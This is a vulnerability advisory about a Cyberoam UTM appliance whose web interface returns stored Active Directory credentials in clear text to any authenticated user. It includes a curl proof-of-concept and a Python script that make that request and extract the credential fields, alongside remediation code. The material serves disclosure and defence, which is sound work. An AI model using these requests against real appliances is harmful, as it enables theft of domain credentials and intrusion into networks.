Hi,
Please find below the details of a vulnerability I discovered in a
Cyberoam UTM device. The vendor was notified; however, I did not
receive any response from the vendor despite repeated email reminders.
SECURITY ADVISORY: cyberoam-utm-insecure-password-handling
Affected Software: Cyberoam CR50ia 10.01.0 build 678
Vulnerability: Insecure Password Handling
Severity: High
Release Date: Unreleased
I. Background
"Cyberoam Unified Threat Management appliances offer assured security,
connectivity and productivity to Small Office-Home Office (SOHO) and
Remote Office-Branch Office (ROBO) users by allowing user
identity-based policy controls." [1]
Cyberoam UTM integrates with Active Directory. To query a configured
AD server, the appliance stores a set of domain credentials on the
device. These credentials can be retrieved by any authenticated user of
the web interface.
II. Description
The stored domain credentials are returned to web clients on an
administrative edit page (Identity –> Authentication –>
Authentication Server –> /Select Configured AD/ ). Any authenticated
client can therefore read the stored credentials in clear text.
A trivial check follows (replace the cookie value with that of an
authenticated session and <webserver> with the appliance address):
curl -s -b "JSESSIONID=u2ur76lhy4qt" -H "Referer: blah" \
  "http://<webserver>/corporate/webpages/identity/ActiveDirectoryEdit.jsp?__RequestType=ajax&&objectID=1&pageid=pagePopupForm1" \
  | egrep '(adminusername|passwdvalue)'
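The same check, written out as an added example rather than code from the advisory, so that the response can be parsed offline and the recovered values reported without printing the full secret. It assumes the page echoes the credentials in HTML input fields named adminusername and passwdvalue (the names the egrep pattern above looks for); the exact markup is an assumption, so the sample response below is constructed, not captured from a device. It also treats an all-asterisk placeholder value as "not leaked", which is what a fixed page might render.

```python
"""Offline check for credential fields echoed by the AD edit page.

Added example, not part of the advisory or Cyberoam's code. The field
names come from the advisory's egrep; the markup is assumed.
"""
import re
import sys
import urllib.request
from typing import Dict

LEAKED_FIELDS = ("adminusername", "passwdvalue")

# Constructed sample body shaped like a form fragment the AJAX request
# could return. Not a real device response.
SAMPLE_RESPONSE = """
<form id="pagePopupForm1">
  <input type="text" name="domainname" value="corp.example">
  <input type="text" name="adminusername" value="svc_cyberoam">
  <input type="password" name="passwdvalue" value="Winter2011!">
  <input type="text" name="ldapport" value="389">
</form>
"""

# Matches <input ... name="<field>" ... value="..."> with name before value
# (an assumption about attribute order).
_FIELD_RE = re.compile(
    r'name=["\']({names})["\'][^>]*\bvalue=["\']([^"\']*)["\']'.format(
        names="|".join(LEAKED_FIELDS)),
    re.IGNORECASE,
)


def find_leaked_fields(body: str) -> Dict[str, str]:
    """Return {field_name: value} for each credential field carrying a real
    value. Empty values and all-asterisk placeholders are ignored, so an
    empty dict means the page did not echo stored credentials (or uses
    markup this regex does not recognise)."""
    found = {}
    for name, value in _FIELD_RE.findall(body):
        if value and set(value) != {"*"}:
            found[name.lower()] = value
    return found


def redact(value: str) -> str:
    """Keep first and last character so a report proves presence only."""
    if len(value) <= 2:
        return "*" * len(value)
    return value[0] + "*" * (len(value) - 2) + value[-1]


def build_url(host: str, object_id: int = 1) -> str:
    """URL from the advisory's curl check; object_id selects which
    configured AD server to fetch (1 in the advisory)."""
    return ("http://{host}/corporate/webpages/identity/ActiveDirectoryEdit.jsp"
            "?__RequestType=ajax&objectID={oid}&pageid=pagePopupForm1"
            .format(host=host, oid=object_id))


def fetch(host: str, jsessionid: str, object_id: int = 1) -> str:
    """The authenticated request the advisory describes, using the cookie
    of an existing session. Only used when run with arguments."""
    req = urllib.request.Request(
        build_url(host, object_id),
        headers={"Cookie": "JSESSIONID=" + jsessionid, "Referer": "blah"},
    )
    with urllib.request.urlopen(req, timeout=15) as resp:
        return resp.read().decode("utf-8", "replace")


def report(body: str) -> int:
    """Print redacted findings; return 1 if credentials leaked, else 0."""
    leaked = find_leaked_fields(body)
    for name, value in sorted(leaked.items()):
        print("LEAKED {}: {}".format(name, redact(value)))
    return 1 if leaked else 0


if __name__ == "__main__":
    # usage: script.py <webserver> <JSESSIONID>   (no args: sample body)
    if len(sys.argv) == 3:
        body = fetch(sys.argv[1], sys.argv[2])
    else:
        body = SAMPLE_RESPONSE
    sys.exit(report(body))
```

Run without arguments it exercises the constructed sample and exits 1; with a host and session cookie it performs the request from the advisory. The exit code makes it usable from a build-verification script after the fix is deployed.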
III. Impact
The vulnerability allows any authenticated user of the appliance to
recover potentially privileged domain credentials. Should the
appliance's default password not have been changed, anyone able to reach
the web interface can log in, read the credentials, and use them as a
trivial entry point onto the Windows domain.
IV. Remediation
Do not return stored credentials to the browser: render the password
field empty on the edit form and only overwrite the stored value when a
new one is submitted. Until a fix is available, restrict the AD account
used by the appliance to the least privilege it needs and rotate its
password, since it should be considered exposed to every user who has
had authenticated access to the device.
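To make the remediation concrete, here is an added illustration (not Cyberoam's code; the form and storage layer are hypothetical stand-ins for the JSP page) of the vulnerable behaviour beside a fixed version. The point it adds is the regression that usually follows removing the echo: if the password field is rendered empty, the update handler must treat an empty submission as "keep the stored value", otherwise simply re-saving the form wipes the AD bind password.

```python
"""Vulnerable vs. fixed handling of a stored AD bind password in an
edit form. Added illustration, not Cyberoam's code; AdServer and STORE
are hypothetical stand-ins for the device's configuration store."""
from dataclasses import dataclass
from typing import Dict


@dataclass
class AdServer:
    object_id: int
    domain: str
    admin_username: str
    bind_password: str  # secret; must never reach a browser


# Constructed sample configuration, mirroring objectID=1 in the advisory.
STORE: Dict[int, AdServer] = {
    1: AdServer(1, "corp.example", "svc_cyberoam", "Winter2011!"),
}


def render_edit_form_vulnerable(object_id: int) -> Dict[str, str]:
    """Mirrors the advisory's finding: the stored password is sent to the
    client so the form can be re-submitted unchanged."""
    s = STORE[object_id]
    return {"domainname": s.domain,
            "adminusername": s.admin_username,
            "passwdvalue": s.bind_password}


def render_edit_form_fixed(object_id: int) -> Dict[str, str]:
    """Never echoes the secret: the password field is rendered empty and
    the UI should state that leaving it empty keeps the stored value."""
    s = STORE[object_id]
    return {"domainname": s.domain,
            "adminusername": s.admin_username,
            "passwdvalue": ""}


def apply_update_fixed(object_id: int, form: Dict[str, str]) -> AdServer:
    """Update handler paired with render_edit_form_fixed. An empty password
    field means 'unchanged', so a round-trip of the form does not wipe the
    stored secret, while a non-empty value replaces it."""
    s = STORE[object_id]
    s.domain = form.get("domainname", s.domain)
    s.admin_username = form.get("adminusername", s.admin_username)
    new_pw = form.get("passwdvalue", "")
    if new_pw != "":
        s.bind_password = new_pw
    return s


def form_leaks_secret(form: Dict[str, str], object_id: int) -> bool:
    """True if the rendered form carries the stored bind password."""
    return STORE[object_id].bind_password in form.values()


if __name__ == "__main__":
    print("vulnerable leaks:", form_leaks_secret(render_edit_form_vulnerable(1), 1))
    print("fixed leaks:     ", form_leaks_secret(render_edit_form_fixed(1), 1))
    f = render_edit_form_fixed(1)
    f["domainname"] = "corp2.example"
    apply_update_fixed(1, f)
    print("password kept after round-trip:", STORE[1].bind_password == "Winter2011!")
```

The same "empty means unchanged" rule applies to any secret the appliance stores (RADIUS shared secrets, LDAP bind passwords); whichever convention is chosen, the value must never be needed client-side to re-save the form.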
V. Disclosure
Reported By: Saurabh Harit, Senior Security Analyst, SensePost
Discovery Date: 2011-11-01
VI. References
[1] http://www.cyberoamworks.com/Cyberoam-CR50ia.asp
Saurabh Harit
Senior Security Analyst
SensePost Pvt Ltd
Phone: +27 768006821